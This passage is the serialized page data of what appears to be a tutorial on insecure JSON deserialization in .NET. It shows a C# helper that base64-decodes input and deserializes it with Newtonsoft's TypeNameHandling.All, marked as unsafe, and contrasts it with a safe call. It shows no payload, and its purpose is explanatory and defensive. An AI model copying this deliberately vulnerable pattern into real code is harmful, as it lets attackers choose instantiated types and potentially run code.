});\n",{"type":32,"tag":89,"props":2410,"children":2411},{"class":91,"line":454},[2412],{"type":32,"tag":89,"props":2413,"children":2414},{"emptyLinePlaceholder":275},[2415],{"type":37,"value":278},{"type":32,"tag":89,"props":2417,"children":2418},{"class":91,"line":503},[2419,2423,2428,2432,2437,2441,2446,2450,2455],{"type":32,"tag":89,"props":2420,"children":2421},{"style":143},[2422],{"type":37,"value":1124},{"type":32,"tag":89,"props":2424,"children":2425},{"style":118},[2426],{"type":37,"value":2427}," encodedData",{"type":32,"tag":89,"props":2429,"children":2430},{"style":124},[2431],{"type":37,"value":156},{"type":32,"tag":89,"props":2433,"children":2434},{"style":159},[2435],{"type":37,"value":2436}," EncodeHelper",{"type":32,"tag":89,"props":2438,"children":2439},{"style":124},[2440],{"type":37,"value":167},{"type":32,"tag":89,"props":2442,"children":2443},{"style":118},[2444],{"type":37,"value":2445},"Encode",{"type":32,"tag":89,"props":2447,"children":2448},{"style":124},[2449],{"type":37,"value":357},{"type":32,"tag":89,"props":2451,"children":2452},{"style":159},[2453],{"type":37,"value":2454},"serializedResult",{"type":32,"tag":89,"props":2456,"children":2457},{"style":124},[2458],{"type":37,"value":907},{"type":32,"tag":89,"props":2460,"children":2461},{"class":91,"line":567},[2462,2467,2471],{"type":32,"tag":89,"props":2463,"children":2464},{"style":143},[2465],{"type":37,"value":2466},"            
return",{"type":32,"tag":89,"props":2468,"children":2469},{"style":159},[2470],{"type":37,"value":2427},{"type":32,"tag":89,"props":2472,"children":2473},{"style":124},[2474],{"type":37,"value":1866},{"type":32,"tag":89,"props":2476,"children":2477},{"class":91,"line":640},[2478],{"type":32,"tag":89,"props":2479,"children":2480},{"style":124},[2481],{"type":37,"value":1276},{"type":32,"tag":89,"props":2483,"children":2484},{"class":91,"line":699},[2485],{"type":32,"tag":89,"props":2486,"children":2487},{"emptyLinePlaceholder":275},[2488],{"type":37,"value":278},{"type":32,"tag":89,"props":2490,"children":2491},{"class":91,"line":752},[2492,2496,2500,2504,2508,2512,2516,2521,2525,2529,2534,2539],{"type":32,"tag":89,"props":2493,"children":2494},{"style":106},[2495],{"type":37,"value":2264},{"type":32,"tag":89,"props":2497,"children":2498},{"style":106},[2499],{"type":37,"value":2269},{"type":32,"tag":89,"props":2501,"children":2502},{"style":112},[2503],{"type":37,"value":1390},{"type":32,"tag":89,"props":2505,"children":2506},{"style":124},[2507],{"type":37,"value":853},{"type":32,"tag":89,"props":2509,"children":2510},{"style":112},[2511],{"type":37,"value":858},{"type":32,"tag":89,"props":2513,"children":2514},{"style":124},[2515],{"type":37,"value":863},{"type":32,"tag":89,"props":2517,"children":2518},{"style":118},[2519],{"type":37,"value":2520}," Deserialize",{"type":32,"tag":89,"props":2522,"children":2523},{"style":124},[2524],{"type":37,"value":357},{"type":32,"tag":89,"props":2526,"children":2527},{"style":143},[2528],{"type":37,"value":362},{"type":32,"tag":89,"props":2530,"children":2531},{"style":118},[2532],{"type":37,"value":2533}," str",{"type":32,"tag":89,"props":2535,"children":2536},{"style":124},[2537],{"type":37,"value":2538},")",{"type":32,"tag":89,"props":2540,"children":2541},{"style":295},[2542],{"type":37,"value":2543}," 
\n",{"type":32,"tag":89,"props":2545,"children":2546},{"class":91,"line":761},[2547],{"type":32,"tag":89,"props":2548,"children":2549},{"style":124},[2550],{"type":37,"value":839},{"type":32,"tag":89,"props":2552,"children":2553},{"class":91,"line":833},[2554,2558,2563,2567,2571,2575,2580,2584,2589],{"type":32,"tag":89,"props":2555,"children":2556},{"style":143},[2557],{"type":37,"value":1124},{"type":32,"tag":89,"props":2559,"children":2560},{"style":118},[2561],{"type":37,"value":2562}," decodedData",{"type":32,"tag":89,"props":2564,"children":2565},{"style":124},[2566],{"type":37,"value":156},{"type":32,"tag":89,"props":2568,"children":2569},{"style":159},[2570],{"type":37,"value":2436},{"type":32,"tag":89,"props":2572,"children":2573},{"style":124},[2574],{"type":37,"value":167},{"type":32,"tag":89,"props":2576,"children":2577},{"style":118},[2578],{"type":37,"value":2579},"Decode",{"type":32,"tag":89,"props":2581,"children":2582},{"style":124},[2583],{"type":37,"value":357},{"type":32,"tag":89,"props":2585,"children":2586},{"style":159},[2587],{"type":37,"value":2588},"str",{"type":32,"tag":89,"props":2590,"children":2591},{"style":124},[2592],{"type":37,"value":907},{"type":32,"tag":89,"props":2594,"children":2595},{"class":91,"line":842},[2596],{"type":32,"tag":89,"props":2597,"children":2598},{"style":295},[2599],{"type":37,"value":2600},"            \n",{"type":32,"tag":89,"props":2602,"children":2603},{"class":91,"line":910},[2604],{"type":32,"tag":89,"props":2605,"children":2606},{"style":96},[2607],{"type":37,"value":2608},"            // unsafe deserialization\n",{"type":32,"tag":89,"props":2610,"children":2611},{"class":91,"line":989},[2612,2617,2622,2626,2630,2634,2639,2643,2648,2652,2656],{"type":32,"tag":89,"props":2613,"children":2614},{"style":106},[2615],{"type":37,"value":2616},"            var",{"type":32,"tag":89,"props":2618,"children":2619},{"style":118},[2620],{"type":37,"value":2621}," 
deserialized",{"type":32,"tag":89,"props":2623,"children":2624},{"style":124},[2625],{"type":37,"value":156},{"type":32,"tag":89,"props":2627,"children":2628},{"style":159},[2629],{"type":37,"value":2336},{"type":32,"tag":89,"props":2631,"children":2632},{"style":124},[2633],{"type":37,"value":167},{"type":32,"tag":89,"props":2635,"children":2636},{"style":118},[2637],{"type":37,"value":2638},"DeserializeObject",{"type":32,"tag":89,"props":2640,"children":2641},{"style":124},[2642],{"type":37,"value":357},{"type":32,"tag":89,"props":2644,"children":2645},{"style":159},[2646],{"type":37,"value":2647},"decodedData",{"type":32,"tag":89,"props":2649,"children":2650},{"style":124},[2651],{"type":37,"value":372},{"type":32,"tag":89,"props":2653,"children":2654},{"style":106},[2655],{"type":37,"value":1385},{"type":32,"tag":89,"props":2657,"children":2658},{"style":112},[2659],{"type":37,"value":2367},{"type":32,"tag":89,"props":2661,"children":2662},{"class":91,"line":997},[2663],{"type":32,"tag":89,"props":2664,"children":2665},{"style":124},[2666],{"type":37,"value":1033},{"type":32,"tag":89,"props":2668,"children":2669},{"class":91,"line":1027},[2670,2674,2678,2682,2686],{"type":32,"tag":89,"props":2671,"children":2672},{"style":159},[2673],{"type":37,"value":2382},{"type":32,"tag":89,"props":2675,"children":2676},{"style":124},[2677],{"type":37,"value":156},{"type":32,"tag":89,"props":2679,"children":2680},{"style":159},[2681],{"type":37,"value":2391},{"type":32,"tag":89,"props":2683,"children":2684},{"style":124},[2685],{"type":37,"value":167},{"type":32,"tag":89,"props":2687,"children":2688},{"style":159},[2689],{"type":37,"value":2400},{"type":32,"tag":89,"props":2691,"children":2692},{"class":91,"line":1036},[2693],{"type":32,"tag":89,"props":2694,"children":2695},{"style":124},[2696],{"type":37,"value":2408},{"type":32,"tag":89,"props":2698,"children":2699},{"class":91,"line":1071},[2700],{"type":32,"tag":89,"props":2701,"children":2702},{"emptyLinePlaceholder":2
75},[2703],{"type":37,"value":278},{"type":32,"tag":89,"props":2705,"children":2706},{"class":91,"line":1080},[2707,2711,2715,2719,2723,2727,2731,2735,2740,2744,2748,2752],{"type":32,"tag":89,"props":2708,"children":2709},{"style":112},[2710],{"type":37,"value":848},{"type":32,"tag":89,"props":2712,"children":2713},{"style":124},[2714],{"type":37,"value":853},{"type":32,"tag":89,"props":2716,"children":2717},{"style":112},[2718],{"type":37,"value":858},{"type":32,"tag":89,"props":2720,"children":2721},{"style":124},[2722],{"type":37,"value":863},{"type":32,"tag":89,"props":2724,"children":2725},{"style":118},[2726],{"type":37,"value":868},{"type":32,"tag":89,"props":2728,"children":2729},{"style":124},[2730],{"type":37,"value":156},{"type":32,"tag":89,"props":2732,"children":2733},{"style":159},[2734],{"type":37,"value":2621},{"type":32,"tag":89,"props":2736,"children":2737},{"style":106},[2738],{"type":37,"value":2739}," as",{"type":32,"tag":89,"props":2741,"children":2742},{"style":112},[2743],{"type":37,"value":1390},{"type":32,"tag":89,"props":2745,"children":2746},{"style":124},[2747],{"type":37,"value":853},{"type":32,"tag":89,"props":2749,"children":2750},{"style":112},[2751],{"type":37,"value":858},{"type":32,"tag":89,"props":2753,"children":2754},{"style":124},[2755],{"type":37,"value":2756},">;\n",{"type":32,"tag":89,"props":2758,"children":2759},{"class":91,"line":1088},[2760],{"type":32,"tag":89,"props":2761,"children":2762},{"emptyLinePlaceholder":275},[2763],{"type":37,"value":278},{"type":32,"tag":89,"props":2765,"children":2766},{"class":91,"line":1118},[2767,2771,2775],{"type":32,"tag":89,"props":2768,"children":2769},{"style":143},[2770],{"type":37,"value":2466},{"type":32,"tag":89,"props":2772,"children":2773},{"style":159},[2774],{"type":37,"value":868},{"type":32,"tag":89,"props":2776,"children":2777},{"style":124},[2778],{"type":37,"value":1866},{"type":32,"tag":89,"props":2780,"children":2781},{"class":91,"line":1162},[2782],{"type":32,"tag":8
9,"props":2783,"children":2784},{"style":124},[2785],{"type":37,"value":1276},{"type":32,"tag":89,"props":2787,"children":2788},{"class":91,"line":1230},[2789],{"type":32,"tag":89,"props":2790,"children":2791},{"style":124},[2792],{"type":37,"value":1648},{"type":32,"tag":89,"props":2794,"children":2795},{"class":91,"line":1270},[2796],{"type":32,"tag":89,"props":2797,"children":2798},{"style":124},[2799],{"type":37,"value":311},{"type":32,"tag":46,"props":2801,"children":2802},{},[2803],{"type":32,"tag":2804,"props":2805,"children":2806},"strong",{},[2807],{"type":37,"value":2808},"It is also important to note that the class responsible for deserializing the objects also encodes and decodes them in base64. Base64 is only an encoding: it adds no integrity or authenticity check to the serialized data.",{"type":32,"tag":2810,"props":2811,"children":2813},"h3",{"id":2812},"what-is-a-serialization",[2814],{"type":37,"value":2815},"What is serialization?",{"type":32,"tag":46,"props":2817,"children":2818},{},[2819],{"type":37,"value":2820},"Serialization and deserialization are essential processes in computer science that involve converting data into a format that can be easily stored, transmitted, or reconstructed.",{"type":32,"tag":46,"props":2822,"children":2823},{},[2824],{"type":37,"value":2825},"Serialization refers to the process of converting an object or data structure into a format (often a byte stream) that can be easily stored in memory. 
During serialization, complex data structures or objects are converted into a linear stream of bytes that can be easily reconstructed back into the original format when needed.",{"type":32,"tag":46,"props":2827,"children":2828},{},[2829],{"type":37,"value":2830},"The vulnerability known as the \"deserialization vulnerability\" in C# and other programming languages arises from the mishandling or inadequate validation of serialized data, leading to potential security risks.",{"type":32,"tag":46,"props":2832,"children":2833},{},[2834],{"type":37,"value":2835},"When data is deserialized, it is converted from its serialized form (often binary or text) back into an object or data structure. If this process is not properly secured, malicious actors may exploit it by supplying crafted input to the deserializer, leading to various security issues.",{"type":32,"tag":46,"props":2837,"children":2838},{},[2839],{"type":37,"value":2840},"Suppose the target is a .NET program or website that accepts data in JSON format over the network, for example via an HTTP header. 
Upon reaching the server, the data undergoes conversion (deserialization) from JSON text into an instance of the Person class, usable by the .NET code.",{"type":32,"tag":46,"props":2842,"children":2843},{},[2844],{"type":37,"value":2845},"If the configuration of the conversion process is inadequate, we can specify a different .NET class for the data to be transformed into, rather than automatically reverting it back into the Person class.",{"type":32,"tag":46,"props":2847,"children":2848},{},[2849],{"type":37,"value":2850},"Here is a quick example with a simple Person class.",{"type":32,"tag":46,"props":2852,"children":2853},{},[2854],{"type":37,"value":2855},"In the code below, we have a class that we serialize and deserialize:",{"type":32,"tag":74,"props":2857,"children":2858},{"lang":76},[2859],{"type":32,"tag":79,"props":2860,"children":2862},{"code":2861,"language":76,"meta":7,"className":82,"style":7},"using System;\nusing Newtonsoft.Json;\nusing System.Collections.Generic;\n\n class Person\n {\n     public string Name { get; set; }\n     public int Age { get; set; }\n }\n\n\npublic class Program\n{\n    public static void Main()\n    {\n        Person person = new Person { Name = \"John\", Age = 30 };\n        \n        string json = JsonConvert.SerializeObject(person);\n        Console.WriteLine(\"Serialized Person:\");\n        Console.WriteLine(json);\n        Person deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n        Console.WriteLine(\"\\nDeserialized Person:\");\n        Console.WriteLine(\"Name:\" + deserializedPerson.Name + \" Age:\" + deserializedPerson.Age);\n    
}\n}\n",[2863],{"type":32,"tag":85,"props":2864,"children":2865},{"__ignoreMap":7},[2866,2882,2905,2938,2945,2957,2965,3010,3051,3058,3065,3072,3088,3095,3120,3127,3202,3210,3252,3290,3318,3368,3410,3498,3505],{"type":32,"tag":89,"props":2867,"children":2868},{"class":91,"line":92},[2869,2873,2878],{"type":32,"tag":89,"props":2870,"children":2871},{"style":143},[2872],{"type":37,"value":2153},{"type":32,"tag":89,"props":2874,"children":2875},{"style":112},[2876],{"type":37,"value":2877}," System",{"type":32,"tag":89,"props":2879,"children":2880},{"style":124},[2881],{"type":37,"value":1866},{"type":32,"tag":89,"props":2883,"children":2884},{"class":91,"line":102},[2885,2889,2893,2897,2901],{"type":32,"tag":89,"props":2886,"children":2887},{"style":143},[2888],{"type":37,"value":2153},{"type":32,"tag":89,"props":2890,"children":2891},{"style":112},[2892],{"type":37,"value":2158},{"type":32,"tag":89,"props":2894,"children":2895},{"style":124},[2896],{"type":37,"value":167},{"type":32,"tag":89,"props":2898,"children":2899},{"style":112},[2900],{"type":37,"value":2167},{"type":32,"tag":89,"props":2902,"children":2903},{"style":124},[2904],{"type":37,"value":1866},{"type":32,"tag":89,"props":2906,"children":2907},{"class":91,"line":130},[2908,2912,2916,2920,2925,2929,2934],{"type":32,"tag":89,"props":2909,"children":2910},{"style":143},[2911],{"type":37,"value":2153},{"type":32,"tag":89,"props":2913,"children":2914},{"style":112},[2915],{"type":37,"value":2877},{"type":32,"tag":89,"props":2917,"children":2918},{"style":124},[2919],{"type":37,"value":167},{"type":32,"tag":89,"props":2921,"children":2922},{"style":112},[2923],{"type":37,"value":2924},"Collections",{"type":32,"tag":89,"props":2926,"children":2927},{"style":124},[2928],{"type":37,"value":167},{"type":32,"tag":89,"props":2930,"children":2931},{"style":112},[2932],{"type":37,"value":2933},"Generic",{"type":32,"tag":89,"props":2935,"children":2936},{"style":124},[2937],{"type":37,"value":1866},{"type":32,"tag":
89,"props":2939,"children":2940},{"class":91,"line":139},[2941],{"type":32,"tag":89,"props":2942,"children":2943},{"emptyLinePlaceholder":275},[2944],{"type":37,"value":278},{"type":32,"tag":89,"props":2946,"children":2947},{"class":91,"line":211},[2948,2952],{"type":32,"tag":89,"props":2949,"children":2950},{"style":106},[2951],{"type":37,"value":2244},{"type":32,"tag":89,"props":2953,"children":2954},{"style":112},[2955],{"type":37,"value":2956}," Person\n",{"type":32,"tag":89,"props":2958,"children":2959},{"class":91,"line":271},[2960],{"type":32,"tag":89,"props":2961,"children":2962},{"style":124},[2963],{"type":37,"value":2964}," {\n",{"type":32,"tag":89,"props":2966,"children":2967},{"class":91,"line":281},[2968,2973,2977,2982,2987,2992,2996,3001,3005],{"type":32,"tag":89,"props":2969,"children":2970},{"style":106},[2971],{"type":37,"value":2972},"     public",{"type":32,"tag":89,"props":2974,"children":2975},{"style":143},[2976],{"type":37,"value":377},{"type":32,"tag":89,"props":2978,"children":2979},{"style":118},[2980],{"type":37,"value":2981}," Name",{"type":32,"tag":89,"props":2983,"children":2984},{"style":124},[2985],{"type":37,"value":2986}," {",{"type":32,"tag":89,"props":2988,"children":2989},{"style":106},[2990],{"type":37,"value":2991}," get",{"type":32,"tag":89,"props":2993,"children":2994},{"style":124},[2995],{"type":37,"value":263},{"type":32,"tag":89,"props":2997,"children":2998},{"style":106},[2999],{"type":37,"value":3000}," set",{"type":32,"tag":89,"props":3002,"children":3003},{"style":124},[3004],{"type":37,"value":263},{"type":32,"tag":89,"props":3006,"children":3007},{"style":124},[3008],{"type":37,"value":3009}," }\n",{"type":32,"tag":89,"props":3011,"children":3012},{"class":91,"line":305},[3013,3017,3022,3027,3031,3035,3039,3043,3047],{"type":32,"tag":89,"props":3014,"children":3015},{"style":106},[3016],{"type":37,"value":2972},{"type":32,"tag":89,"props":3018,"children":3019},{"style":143},[3020],{"type":37,"value":3021}," 
int",{"type":32,"tag":89,"props":3023,"children":3024},{"style":118},[3025],{"type":37,"value":3026}," Age",{"type":32,"tag":89,"props":3028,"children":3029},{"style":124},[3030],{"type":37,"value":2986},{"type":32,"tag":89,"props":3032,"children":3033},{"style":106},[3034],{"type":37,"value":2991},{"type":32,"tag":89,"props":3036,"children":3037},{"style":124},[3038],{"type":37,"value":263},{"type":32,"tag":89,"props":3040,"children":3041},{"style":106},[3042],{"type":37,"value":3000},{"type":32,"tag":89,"props":3044,"children":3045},{"style":124},[3046],{"type":37,"value":263},{"type":32,"tag":89,"props":3048,"children":3049},{"style":124},[3050],{"type":37,"value":3009},{"type":32,"tag":89,"props":3052,"children":3053},{"class":91,"line":314},[3054],{"type":32,"tag":89,"props":3055,"children":3056},{"style":124},[3057],{"type":37,"value":3009},{"type":32,"tag":89,"props":3059,"children":3060},{"class":91,"line":331},[3061],{"type":32,"tag":89,"props":3062,"children":3063},{"emptyLinePlaceholder":275},[3064],{"type":37,"value":278},{"type":32,"tag":89,"props":3066,"children":3067},{"class":91,"line":339},[3068],{"type":32,"tag":89,"props":3069,"children":3070},{"emptyLinePlaceholder":275},[3071],{"type":37,"value":278},{"type":32,"tag":89,"props":3073,"children":3074},{"class":91,"line":390},[3075,3079,3083],{"type":32,"tag":89,"props":3076,"children":3077},{"style":106},[3078],{"type":37,"value":109},{"type":32,"tag":89,"props":3080,"children":3081},{"style":106},[3082],{"type":37,"value":2244},{"type":32,"tag":89,"props":3084,"children":3085},{"style":112},[3086],{"type":37,"value":3087}," 
Program\n",{"type":32,"tag":89,"props":3089,"children":3090},{"class":91,"line":398},[3091],{"type":32,"tag":89,"props":3092,"children":3093},{"style":124},[3094],{"type":37,"value":136},{"type":32,"tag":89,"props":3096,"children":3097},{"class":91,"line":454},[3098,3102,3106,3111,3116],{"type":32,"tag":89,"props":3099,"children":3100},{"style":106},[3101],{"type":37,"value":2239},{"type":32,"tag":89,"props":3103,"children":3104},{"style":106},[3105],{"type":37,"value":2269},{"type":32,"tag":89,"props":3107,"children":3108},{"style":143},[3109],{"type":37,"value":3110}," void",{"type":32,"tag":89,"props":3112,"children":3113},{"style":118},[3114],{"type":37,"value":3115}," Main",{"type":32,"tag":89,"props":3117,"children":3118},{"style":124},[3119],{"type":37,"value":127},{"type":32,"tag":89,"props":3121,"children":3122},{"class":91,"line":503},[3123],{"type":32,"tag":89,"props":3124,"children":3125},{"style":124},[3126],{"type":37,"value":758},{"type":32,"tag":89,"props":3128,"children":3129},{"class":91,"line":567},[3130,3135,3140,3144,3148,3153,3157,3161,3165,3170,3175,3179,3183,3187,3191,3197],{"type":32,"tag":89,"props":3131,"children":3132},{"style":112},[3133],{"type":37,"value":3134},"        Person",{"type":32,"tag":89,"props":3136,"children":3137},{"style":118},[3138],{"type":37,"value":3139}," person",{"type":32,"tag":89,"props":3141,"children":3142},{"style":124},[3143],{"type":37,"value":156},{"type":32,"tag":89,"props":3145,"children":3146},{"style":106},[3147],{"type":37,"value":1385},{"type":32,"tag":89,"props":3149,"children":3150},{"style":112},[3151],{"type":37,"value":3152}," 
Person",{"type":32,"tag":89,"props":3154,"children":3155},{"style":124},[3156],{"type":37,"value":2986},{"type":32,"tag":89,"props":3158,"children":3159},{"style":159},[3160],{"type":37,"value":2981},{"type":32,"tag":89,"props":3162,"children":3163},{"style":124},[3164],{"type":37,"value":156},{"type":32,"tag":89,"props":3166,"children":3167},{"style":180},[3168],{"type":37,"value":3169}," \"",{"type":32,"tag":89,"props":3171,"children":3172},{"style":186},[3173],{"type":37,"value":3174},"John",{"type":32,"tag":89,"props":3176,"children":3177},{"style":180},[3178],{"type":37,"value":183},{"type":32,"tag":89,"props":3180,"children":3181},{"style":124},[3182],{"type":37,"value":372},{"type":32,"tag":89,"props":3184,"children":3185},{"style":159},[3186],{"type":37,"value":3026},{"type":32,"tag":89,"props":3188,"children":3189},{"style":124},[3190],{"type":37,"value":156},{"type":32,"tag":89,"props":3192,"children":3194},{"style":3193},"--shiki-default:#4C9A91",[3195],{"type":37,"value":3196}," 30",{"type":32,"tag":89,"props":3198,"children":3199},{"style":124},[3200],{"type":37,"value":3201}," };\n",{"type":32,"tag":89,"props":3203,"children":3204},{"class":91,"line":640},[3205],{"type":32,"tag":89,"props":3206,"children":3207},{"style":295},[3208],{"type":37,"value":3209},"        \n",{"type":32,"tag":89,"props":3211,"children":3212},{"class":91,"line":699},[3213,3218,3223,3227,3231,3235,3239,3243,3248],{"type":32,"tag":89,"props":3214,"children":3215},{"style":143},[3216],{"type":37,"value":3217},"        string",{"type":32,"tag":89,"props":3219,"children":3220},{"style":118},[3221],{"type":37,"value":3222}," 
json",{"type":32,"tag":89,"props":3224,"children":3225},{"style":124},[3226],{"type":37,"value":156},{"type":32,"tag":89,"props":3228,"children":3229},{"style":159},[3230],{"type":37,"value":2336},{"type":32,"tag":89,"props":3232,"children":3233},{"style":124},[3234],{"type":37,"value":167},{"type":32,"tag":89,"props":3236,"children":3237},{"style":118},[3238],{"type":37,"value":2345},{"type":32,"tag":89,"props":3240,"children":3241},{"style":124},[3242],{"type":37,"value":357},{"type":32,"tag":89,"props":3244,"children":3245},{"style":159},[3246],{"type":37,"value":3247},"person",{"type":32,"tag":89,"props":3249,"children":3250},{"style":124},[3251],{"type":37,"value":907},{"type":32,"tag":89,"props":3253,"children":3254},{"class":91,"line":752},[3255,3260,3264,3269,3273,3277,3282,3286],{"type":32,"tag":89,"props":3256,"children":3257},{"style":159},[3258],{"type":37,"value":3259},"        Console",{"type":32,"tag":89,"props":3261,"children":3262},{"style":124},[3263],{"type":37,"value":167},{"type":32,"tag":89,"props":3265,"children":3266},{"style":118},[3267],{"type":37,"value":3268},"WriteLine",{"type":32,"tag":89,"props":3270,"children":3271},{"style":124},[3272],{"type":37,"value":357},{"type":32,"tag":89,"props":3274,"children":3275},{"style":180},[3276],{"type":37,"value":183},{"type":32,"tag":89,"props":3278,"children":3279},{"style":186},[3280],{"type":37,"value":3281},"Serialized 
Person:",{"type":32,"tag":89,"props":3283,"children":3284},{"style":180},[3285],{"type":37,"value":183},{"type":32,"tag":89,"props":3287,"children":3288},{"style":124},[3289],{"type":37,"value":907},{"type":32,"tag":89,"props":3291,"children":3292},{"class":91,"line":761},[3293,3297,3301,3305,3309,3314],{"type":32,"tag":89,"props":3294,"children":3295},{"style":159},[3296],{"type":37,"value":3259},{"type":32,"tag":89,"props":3298,"children":3299},{"style":124},[3300],{"type":37,"value":167},{"type":32,"tag":89,"props":3302,"children":3303},{"style":118},[3304],{"type":37,"value":3268},{"type":32,"tag":89,"props":3306,"children":3307},{"style":124},[3308],{"type":37,"value":357},{"type":32,"tag":89,"props":3310,"children":3311},{"style":159},[3312],{"type":37,"value":3313},"json",{"type":32,"tag":89,"props":3315,"children":3316},{"style":124},[3317],{"type":37,"value":907},{"type":32,"tag":89,"props":3319,"children":3320},{"class":91,"line":833},[3321,3325,3330,3334,3338,3342,3346,3350,3355,3360,3364],{"type":32,"tag":89,"props":3322,"children":3323},{"style":112},[3324],{"type":37,"value":3134},{"type":32,"tag":89,"props":3326,"children":3327},{"style":118},[3328],{"type":37,"value":3329}," 
deserializedPerson",{"type":32,"tag":89,"props":3331,"children":3332},{"style":124},[3333],{"type":37,"value":156},{"type":32,"tag":89,"props":3335,"children":3336},{"style":159},[3337],{"type":37,"value":2336},{"type":32,"tag":89,"props":3339,"children":3340},{"style":124},[3341],{"type":37,"value":167},{"type":32,"tag":89,"props":3343,"children":3344},{"style":118},[3345],{"type":37,"value":2638},{"type":32,"tag":89,"props":3347,"children":3348},{"style":124},[3349],{"type":37,"value":853},{"type":32,"tag":89,"props":3351,"children":3352},{"style":112},[3353],{"type":37,"value":3354},"Person",{"type":32,"tag":89,"props":3356,"children":3357},{"style":124},[3358],{"type":37,"value":3359},">(",{"type":32,"tag":89,"props":3361,"children":3362},{"style":159},[3363],{"type":37,"value":3313},{"type":32,"tag":89,"props":3365,"children":3366},{"style":124},[3367],{"type":37,"value":907},{"type":32,"tag":89,"props":3369,"children":3370},{"class":91,"line":842},[3371,3375,3379,3383,3387,3391,3397,3402,3406],{"type":32,"tag":89,"props":3372,"children":3373},{"style":159},[3374],{"type":37,"value":3259},{"type":32,"tag":89,"props":3376,"children":3377},{"style":124},[3378],{"type":37,"value":167},{"type":32,"tag":89,"props":3380,"children":3381},{"style":118},[3382],{"type":37,"value":3268},{"type":32,"tag":89,"props":3384,"children":3385},{"style":124},[3386],{"type":37,"value":357},{"type":32,"tag":89,"props":3388,"children":3389},{"style":180},[3390],{"type":37,"value":183},{"type":32,"tag":89,"props":3392,"children":3394},{"style":3393},"--shiki-default:#C99076",[3395],{"type":37,"value":3396},"\\n",{"type":32,"tag":89,"props":3398,"children":3399},{"style":186},[3400],{"type":37,"value":3401},"Deserialized 
Person:",{"type":32,"tag":89,"props":3403,"children":3404},{"style":180},[3405],{"type":37,"value":183},{"type":32,"tag":89,"props":3407,"children":3408},{"style":124},[3409],{"type":37,"value":907},{"type":32,"tag":89,"props":3411,"children":3412},{"class":91,"line":910},[3413,3417,3421,3425,3429,3433,3438,3442,3447,3451,3455,3460,3464,3468,3473,3477,3481,3485,3489,3494],{"type":32,"tag":89,"props":3414,"children":3415},{"style":159},[3416],{"type":37,"value":3259},{"type":32,"tag":89,"props":3418,"children":3419},{"style":124},[3420],{"type":37,"value":167},{"type":32,"tag":89,"props":3422,"children":3423},{"style":118},[3424],{"type":37,"value":3268},{"type":32,"tag":89,"props":3426,"children":3427},{"style":124},[3428],{"type":37,"value":357},{"type":32,"tag":89,"props":3430,"children":3431},{"style":180},[3432],{"type":37,"value":183},{"type":32,"tag":89,"props":3434,"children":3435},{"style":186},[3436],{"type":37,"value":3437},"Name:",{"type":32,"tag":89,"props":3439,"children":3440},{"style":180},[3441],{"type":37,"value":183},{"type":32,"tag":89,"props":3443,"children":3444},{"style":106},[3445],{"type":37,"value":3446}," +",{"type":32,"tag":89,"props":3448,"children":3449},{"style":159},[3450],{"type":37,"value":3329},{"type":32,"tag":89,"props":3452,"children":3453},{"style":124},[3454],{"type":37,"value":167},{"type":32,"tag":89,"props":3456,"children":3457},{"style":159},[3458],{"type":37,"value":3459},"Name",{"type":32,"tag":89,"props":3461,"children":3462},{"style":106},[3463],{"type":37,"value":3446},{"type":32,"tag":89,"props":3465,"children":3466},{"style":180},[3467],{"type":37,"value":3169},{"type":32,"tag":89,"props":3469,"children":3470},{"style":186},[3471],{"type":37,"value":3472}," 
Age:",{"type":32,"tag":89,"props":3474,"children":3475},{"style":180},[3476],{"type":37,"value":183},{"type":32,"tag":89,"props":3478,"children":3479},{"style":106},[3480],{"type":37,"value":3446},{"type":32,"tag":89,"props":3482,"children":3483},{"style":159},[3484],{"type":37,"value":3329},{"type":32,"tag":89,"props":3486,"children":3487},{"style":124},[3488],{"type":37,"value":167},{"type":32,"tag":89,"props":3490,"children":3491},{"style":159},[3492],{"type":37,"value":3493},"Age",{"type":32,"tag":89,"props":3495,"children":3496},{"style":124},[3497],{"type":37,"value":907},{"type":32,"tag":89,"props":3499,"children":3500},{"class":91,"line":989},[3501],{"type":32,"tag":89,"props":3502,"children":3503},{"style":124},[3504],{"type":37,"value":1648},{"type":32,"tag":89,"props":3506,"children":3507},{"class":91,"line":997},[3508],{"type":32,"tag":89,"props":3509,"children":3510},{"style":124},[3511],{"type":37,"value":311},{"type":32,"tag":46,"props":3513,"children":3514},{},[3515],{"type":37,"value":3516},"The output of this code is as follows:",{"type":32,"tag":74,"props":3518,"children":3520},{"lang":3519},"txt",[3521],{"type":32,"tag":79,"props":3522,"children":3524},{"code":3523},"Serialized Person:\n{\"Name\":\"John\",\"Age\":30}\n\nDeserialized Person:\nName:John Age:30\n",[3525],{"type":32,"tag":85,"props":3526,"children":3527},{"__ignoreMap":7},[3528],{"type":37,"value":3523},{"type":32,"tag":2810,"props":3530,"children":3532},{"id":3531},"so-what-is-the-problem",[3533],{"type":37,"value":3534},"So what is the problem?",{"type":32,"tag":46,"props":3536,"children":3537},{},[3538],{"type":37,"value":3539},"In our case, the deserialization is properly protected: our data is a simple JSON string representing a Person object.",{"type":32,"tag":46,"props":3541,"children":3542},{},[3543,3545,3551],{"type":37,"value":3544},"The unsafe use of deserialization occurs when the 
",{"type":32,"tag":85,"props":3546,"children":3548},{"className":3547},[],[3549],{"type":37,"value":3550},"TypeNameHandling.All",{"type":37,"value":3552}," option is set in the JsonSerializerSettings passed as the second parameter of DeserializeObject. With this option the deserializer trusts the $type field of the incoming JSON, so whoever supplies the data chooses which class is instantiated and which values its attributes receive. Leaving TypeNameHandling at its default of None, or restricting the allowed types with a custom SerializationBinder, removes that choice from the input.",{"type":32,"tag":74,"props":3554,"children":3555},{"lang":76},[3556],{"type":32,"tag":79,"props":3557,"children":3559},{"code":3558,"language":76,"meta":7,"className":82,"style":7},"// With safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json);\n\n// Without safe deserialization\nPerson deserializedPerson = JsonConvert.DeserializeObject\u003CPerson>(json, new JsonSerializerSettings {\n                TypeNameHandling = TypeNameHandling.All\n});\n",[3560],{"type":32,"tag":85,"props":3561,"children":3562},{"__ignoreMap":7},[3563,3571,3618,3625,3633,3693,3716],{"type":32,"tag":89,"props":3564,"children":3565},{"class":91,"line":92},[3566],{"type":32,"tag":89,"props":3567,"children":3568},{"style":96},[3569],{"type":37,"value":3570},"// With safe 
